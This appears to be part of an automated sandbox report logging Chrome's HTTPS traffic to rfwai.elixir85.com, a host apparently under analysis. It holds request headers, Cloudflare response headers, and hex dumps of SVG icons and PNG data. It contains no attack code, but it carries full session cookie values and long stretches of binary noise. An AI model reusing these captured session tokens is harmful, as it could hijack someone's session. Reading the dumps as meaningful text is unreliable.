                                                        2024-07-03 19:07:24 UTC1369INData Raw: 33 20 34 37 2e 33 31 32 35 20 32 39 2e 31 34 30 37 20 34 37 2e 33 31 32 35 20 32 31 2e 31 32 38 37 48 33 39 2e 33 31 32 35 5a 4d 33 39 2e 33 31 32 34 20 32 31 2e 30 39 36 43 33 39 2e 33 31 32 35 20 32 31 2e 31 30 36 38 20 33 39 2e 33 31 32 35 20 32 31 2e 31 31 37 38 20 33 39 2e 33 31 32 35 20 32 31 2e 31 32 38 37 48 34 37 2e 33 31 32 35 43 34 37 2e 33 31 32 35 20 32 31 2e 30 39 38 32 20 34 37 2e 33 31 32 34 20 32 31 2e 30 36 37 36 20 34 37 2e 33 31 32 32 20 32 31 2e 30 33 37 4c 33 39 2e 33 31 32 34 20 32 31 2e 30 39 36 5a 4d 33 39 2e 33 31 32 35 20 32 30 2e 39 34 31 32 43 33 39 2e 33 31 32 35 20 32 30 2e 39 37 38 20 33 39 2e 33 31 32 34 20 32 31 2e 30 31 34 39 20 33 39 2e 33 31 32 33 20 32 31 2e 30 35 31 39 4c 34 37 2e 33 31 32 32 20 32 31 2e 30 38 31 31
                                                        Data Ascii: 3 47.3125 29.1407 47.3125 21.1287H39.3125ZM39.3124 21.096C39.3125 21.1068 39.3125 21.1178 39.3125 21.1287H47.3125C47.3125 21.0982 47.3124 21.0676 47.3122 21.037L39.3124 21.096ZM39.3125 20.9412C39.3125 20.978 39.3124 21.0149 39.3123 21.0519L47.3122 21.0811
                                                        2024-07-03 19:07:24 UTC1203INData Raw: 2e 34 38 39 20 34 38 2e 32 39 39 4c 32 31 2e 37 31 32 39 20 34 31 2e 35 30 35 4c 32 31 2e 37 31 30 37 20 34 31 2e 35 30 33 37 4c 31 37 2e 34 38 36 38 20 34 38 2e 32 39 37 37 5a 4d 39 2e 31 31 35 33 39 20 34 30 2e 39 37 32 36 43 31 31 2e 32 35 34 31 20 34 33 2e 36 33 38 33 20 31 34 2e 30 30 31 31 20 34 36 2e 31 33 31 34 20 31 37 2e 34 38 37 34 20 34 38 2e 32 39 38 4c 32 31 2e 37 31 30 32 20 34 31 2e 35 30 33 33 43 31 38 2e 39 37 34 32 20 33 39 2e 38 30 33 20 31 36 2e 39 31 34 33 20 33 37 2e 39 30 39 33 20 31 35 2e 33 35 35 33 20 33 35 2e 39 36 36 33 4c 39 2e 31 31 35 33 39 20 34 30 2e 39 37 32 36 5a 4d 31 36 2e 35 37 32 38 20 31 36 2e 31 33 36 31 43 32 31 2e 34 39 38 34 20 31 35 2e 37 30 30 36 20 32 36 2e 34 35 31 33 20 31 35 2e 37 30 34 37 20 33 31 2e 33
                                                        Data Ascii: .489 48.299L21.7129 41.505L21.7107 41.5037L17.4868 48.2977ZM9.11539 40.9726C11.2541 43.6383 14.0011 46.1314 17.4874 48.298L21.7102 41.5033C18.9742 39.803 16.9143 37.9093 15.3553 35.9663L9.11539 40.9726ZM16.5728 16.1361C21.4984 15.7006 26.4513 15.7047 31.3
                                                        2024-07-03 19:07:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        76192.168.2.549807104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:23 UTC1111OUTGET /yoCRQfrZ0iVvPSQxT7vvEGN44mzSHgJf035E0VZBImhSjl HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:24 UTC583INHTTP/1.1 404 Not Found
                                                        Date: Wed, 03 Jul 2024 19:07:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bnZBzm1b6kSL9lqE%2F%2FoZ0pOyhMWKqchZo8tcJ%2BeJq9d2pgvVQseXZwPn2oi3yp%2B2QDObLFK%2BqoTchyOC6vpobHLtid4QzI4pA1acAkxvcDHR22vgftHFCW0qJVYLVw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 89d92881d9c617a9-EWR
                                                        2024-07-03 19:07:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        77192.168.2.549808104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:23 UTC1436OUTGET /yzRdfjjshRC3IrYk8A7PQOd9IO3rsWR2oi1eXvnzkPxuZab180 HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:24 UTC649INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:24 GMT
                                                        Content-Type: image/svg+xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Content-Disposition: inline; filename="yzRdfjjshRC3IrYk8A7PQOd9IO3rsWR2oi1eXvnzkPxuZab180"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rmp4JbZfFXx80Cct3ME2U9kBePHTFtb54Cym1rcXQF1%2FvxjEFv6CIVEgi1dTySm5tQWUpowKfgQlVWSHqJKEcNju93WtJPhaIRwbZNHIEEoxu2lEEX2NufHpWTYAXg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 89d928826ff8c427-EWR
                                                        2024-07-03 19:07:24 UTC720INData Raw: 62 35 39 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 30 2e 34 32 32 2c 32 39 2e 30 39 32 61 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2e 32 36 31 2c 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2e 37 34 39 71 2e 33 36 36 2e 33 36 36 2e 38 32 37 2e 37 37 35 74 2e 39 34 39 2e 38 35
                                                        Data Ascii: b59<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.85
                                                        2024-07-03 19:07:24 UTC1369INData Raw: 32 2e 36 39 2c 31 33 2e 34 38 35 2c 31 33 2e 34 38 35 2c 30 2c 30 2c 31 2c 36 2c 31 38 2e 38 36 36 2c 39 2e 34 35 33 2c 39 2e 34 35 33 2c 30 2c 30 2c 31 2c 36 2e 32 33 35 2c 31 36 2e 36 61 36 2e 32 2c 36 2e 32 2c 30 2c 30 2c 31 2c 2e 37 2d 31 2e 37 30 37 2c 38 2e 38 34 38 2c 38 2e 38 34 38 2c 30 2c 30 2c 31 2c 31 2e 31 34 31 2d 31 2e 34 38 39 71 2e 36 37 39 2d 2e 37 32 33 2c 31 2e 35 38 35 2d 31 2e 36 31 31 61 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2d 2e 37 34 39 2c 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2d 2e 32 36 31 2c 33 2e 33 2c 33 2e 33 2c 30 2c 30 2c 31 2c 31 2e 36 38 31 2e 34 37 2c 38 2e 36 34 38 2c 38 2e 36 34 38 2c 30 2c 30 2c 31 2c 31 2e 35 34 32 2c 31 2e 31 35 2c 31 37 2e 37 32 35 2c
                                                        Data Ascii: 2.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,
                                                        2024-07-03 19:07:24 UTC823INData Raw: 2c 33 2e 35 32 2c 30 2c 30 2c 31 2d 2e 37 35 38 2d 31 2e 31 32 34 2c 33 2e 33 37 35 2c 33 2e 33 37 35 2c 30 2c 30 2c 31 2d 2e 32 37 2d 31 2e 33 33 33 2c 33 2e 30 36 32 2c 33 2e 30 36 32 2c 30 2c 30 2c 31 2c 2e 32 32 36 2d 31 2e 32 31 31 2c 34 2e 33 31 33 2c 34 2e 33 31 33 2c 30 2c 30 2c 31 2c 2e 35 36 36 2d 2e 39 36 37 2c 36 2e 33 36 34 2c 36 2e 33 36 34 2c 30 2c 30 2c 31 2c 2e 37 33 32 2d 2e 37 39 33 71 2e 33 39 32 2d 2e 33 35 37 2e 37 33 32 2d 2e 36 38 38 61 34 2e 36 37 38 2c 34 2e 36 37 38 2c 30 2c 30 2c 30 2c 2e 35 36 36 2d 2e 36 35 33 2c 31 2e 31 37 35 2c 31 2e 31 37 35 2c 30 2c 30 2c 30 2c 2e 32 32 36 2d 2e 36 38 38 2c 31 2e 33 33 39 2c 31 2e 33 33 39 2c 30 2c 30 2c 30 2d 2e 32 37 39 2d 2e 36 34 35 41 31 31 2e 32 39 33 2c 31 31 2e 32 39 33 2c 30 2c
                                                        Data Ascii: ,3.52,0,0,1-.758-1.124,3.375,3.375,0,0,1-.27-1.333,3.062,3.062,0,0,1,.226-1.211,4.313,4.313,0,0,1,.566-.967,6.364,6.364,0,0,1,.732-.793q.392-.357.732-.688a4.678,4.678,0,0,0,.566-.653,1.175,1.175,0,0,0,.226-.688,1.339,1.339,0,0,0-.279-.645A11.293,11.293,0,
                                                        2024-07-03 19:07:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        78192.168.2.549809104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:23 UTC1448OUTGET /rs3DhQgZj5jQkQBct28ombhTCAHmieGU0ouxgh9zt47ITiP0AvmihR1tBef200 HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:24 UTC669INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:24 GMT
                                                        Content-Type: image/svg+xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Content-Disposition: inline; filename="rs3DhQgZj5jQkQBct28ombhTCAHmieGU0ouxgh9zt47ITiP0AvmihR1tBef200"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f7NGUxqxeGRpiSnbcV4DbTF02xwsLA48ej%2F%2FtEWiBZFUHT1xmf3Kc7Buif50LOvUCoic8z5zZJLfH2n5xRPJPNRqduN7%2FiMiE01%2FpMcku55ZhjB1BzaiqB993qV%2BUg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 89d9288299b9437a-EWR
                                                        2024-07-03 19:07:24 UTC275INData Raw: 31 30 63 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 31 30 2c 33 32 48 33 38 56 31 38 2e 31 32 35 4c 32 34 2c 32 35 2e 31 30 39 2c 31 30 2c 31 38 2e 31 32 35 56 33 32 6d 2e 32 33 34 2d 31 36 4c 32 34 2c 32 32 2e 38 39 31 2c 33 37 2e 37 36 36 2c 31 36 48 31 30 2e 32 33 34 4d 34 30 2c 33 34 48 38 56 31 34 48 34 30 5a 22 20 66 69 6c 6c
                                                        Data Ascii: 10c<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill
                                                        2024-07-03 19:07:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        79192.168.2.549812104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:24 UTC1465OUTGET /ijW6ax7zUB7JKxnxsqoYba3bEJXUHkaugjRSkLLb83klpSwyDyWXfGqe6G7wTrPhUrnsIYwrzp12209 HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:25 UTC669INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:25 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 49602
                                                        Connection: close
                                                        Content-Disposition: inline; filename="ijW6ax7zUB7JKxnxsqoYba3bEJXUHkaugjRSkLLb83klpSwyDyWXfGqe6G7wTrPhUrnsIYwrzp12209"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HV1zzTZs0fH2D2Un%2FnXbJ54jBKVaPyGvG003Ayfk5JwY4RkhcZS9Kjcy2cU9iPvyoVTxKHcMADienr6BEmCctmJgMX3USOiCV4X0A8G2xK2iSp6y6vIhFiEtoaDq7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 89d92887ba87431c-EWR
                                                        2024-07-03 19:07:25 UTC700INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 70 00 00 01 bb 08 06 00 00 00 a1 7b f0 cd 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 3b b6 00 00 3b b6 01 16 33 14 2b 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 77 77 77 2e 69 6e 6b 73 63 61 70 65 2e 6f 72 67 9b ee 3c 1a 00 00 20 00 49 44 41 54 78 9c ec dd 77 98 5d 55 bd ff f1 f7 4c 1a 49 28 21 04 42 ef bd 08 4a bb 0a 52 94 aa 02 16 50 44 e1 7a 2d a8 28 a0 82 a2 34 51 01 f1 2a 4d 51 2e 20 0a 28 fa 13 45 45 04 41 50 3a ea 05 04 0d 08 48 49 a4 05 09 10 20 09 e9 c9 ef 8f 75 72 33 09 93 72 ce 59 fb 7c f7 de e7 fd 7a 9e ef 33 93 32 c9 67 d6 de 7b f6 cc 59 df bd 56 0f ea 36 c3 81 75 80 b5 80 55 80 95 80 51 8d 5a 19 58 1e 18 01 0c 06 96 6d d4 a0 c6 c7 0d ee e7 df
                                                        Data Ascii: PNGIHDRp{sBIT|dpHYs;;3+tEXtSoftwarewww.inkscape.org< IDATxw]ULI(!BJRPDz-(4Q*MQ. (EEAP:HI ur3rY|z32g{YV6uUQZXm
                                                        2024-07-03 19:07:25 UTC1369INData Raw: 01 f8 3d 70 2d 70 3d 6e b9 22 49 92 24 49 92 24 49 92 24 65 67 03 47 bc 81 c0 ee c0 81 c0 01 c0 e8 d8 38 b5 f5 08 69 02 fa 06 d2 8a 02 93 62 e3 a8 20 5b 00 7b 91 56 ae d9 15 18 16 1b a7 96 e6 90 56 e4 b8 12 f8 39 36 47 49 92 24 49 92 24 49 92 24 49 59 d8 c0 11 63 20 f0 16 52 d3 c6 bb 80 51 b1 71 ba ce 2c d2 f6 10 bf 05 ae 02 fe 19 1b 47 6d 18 0a ec 01 ec 0f bc 0d 58 3d 36 4e 57 ba 0b f8 05 a9 99 63 6c 70 16 49 92 24 49 92 24 49 92 24 49 5a 2a 9b 02 67 00 cf 02 73 ad d2 d4 63 c0 b9 a4 46 80 41 8b 3c 7a 2a 8b 51 c0 61 c0 15 c0 2b c4 9f 3f d6 fc ba 1b 38 1c 58 6e 91 47 4f 92 24 49 92 24 49 92 24 49 92 82 2c 4f 9a 6c be 81 b4 f5 40 f4 04 ab b5 f8 7a 1e b8 0c d8 8f b4 52 8a ca 61 24 e9 3a ba 1a 98 49 fc 79 62 2d be a6 92 1a 6c f6 c0 95 9e 24 49 92 24 49 92 24
                                                        Data Ascii: =p-p=n"I$I$I$egG8ib [{VV96GI$I$I$IYc RQq,GmX=6NWclpI$I$I$IZ*gscFA<z*Qa+?8XnGO$I$I$I,Ol@zRa$:Iyb-l$I$I$
                                                        2024-07-03 19:07:25 UTC1369INData Raw: 92 24 49 92 24 49 92 a0 fa 0d 1c 67 00 e7 50 9f 95 44 24 49 9d b3 1a f0 47 60 db e8 20 92 24 49 92 24 49 92 24 49 52 95 1b 1f 4e 03 8e 8f 0e 21 49 aa bc 97 80 3d 80 7b a2 83 48 92 24 49 92 24 49 92 24 a9 7b 55 75 05 8e af 60 f3 86 24 29 8f 11 c0 75 b8 9d 8a 24 49 92 24 49 92 24 49 92 02 55 71 05 8e 63 81 6f 46 87 90 24 d5 ce 04 60 77 e0 81 e8 20 92 24 49 92 24 49 92 24 49 ea 3e 55 6b e0 f8 2c 70 56 74 08 49 52 6d fd 9b d4 c4 f1 60 74 10 49 92 24 49 92 24 49 92 24 75 97 2a 35 70 1c 05 9c 1b 1d 42 92 54 7b 4f 03 bb 02 8f 45 07 91 24 49 92 24 49 92 24 49 52 f7 a8 4a 03 c7 11 c0 79 54 27 af 24 a9 da 9e 20 35 71 8c 0b ce 21 49 92 24 49 92 24 49 92 a4 2e 51 85 86 88 f7 00 57 00 bd d1 41 24 49 5d e5 31 e0 3f 80 e7 a3 83 48 92 24 49 92 24 49 92 24 a9 fe ca de c0
                                                        Data Ascii: $I$IgPD$IG` $I$I$IRN!I={H$I$I${Uu`$)u$I$I$IUqcoF$`w $I$I$I>Uk,pVtIRm`tI$I$I$u*5pBT{OE$I$I$IRJyT'$ 5q!I$I$I.QWA$I]1?H$I$I$
                                                        2024-07-03 19:07:25 UTC1369INData Raw: af 5f ba c3 a2 12 1b 01 5c 40 fc 39 d5 e9 7a 77 8e c1 93 24 49 92 24 49 92 24 49 92 8a f6 51 e2 27 d7 3a 59 37 00 6b 67 19 39 95 c5 bc 46 8e 7f 10 7f 7e d5 a9 66 00 97 01 9b 2c fd a1 50 45 bc 03 78 86 f8 73 ac 53 35 1e 18 99 65 e4 24 49 92 24 49 92 24 49 92 a4 82 ac 01 4c 24 7e 72 ad 13 35 13 38 06 57 dd a8 b3 5e e0 60 60 0c f1 e7 5b 95 6b 2a f0 5d d2 d6 4a aa af 55 81 9b 89 3f df 3a 55 97 66 19 35 49 92 24 49 92 24 49 92 24 a9 20 57 13 3f a9 d6 89 7a 16 d8 2d cf 90 a9 02 7a 81 f7 00 0f 12 7f ee 55 a9 66 00 df 03 56 6f 7e c8 55 51 03 81 33 89 3f f7 3a 55 fb e6 19 36 49 92 24 49 92 24 49 92 24 29 af 43 89 9f 4c eb 44 dd 85 2b 09 74 a3 cd 81 a7 89 3f ff aa 50 73 80 2b 80 8d 5a 1a 69 d5 c1 01 c0 4b c4 9f 8b 45 d7 d3 c0 88 4c 63 26 49 92 24 49 92 24 49 92 24
                                                        Data Ascii: _\@9zw$I$I$IQ':Y7kg9F~f,PExsS5e$I$I$IL$~r58W^``[k*]JU?:Uf5I$I$I$ W?z-zUfVo~UQ3?:U6I$I$I$)CLD+t?Ps+ZiKELc&I$I$I$
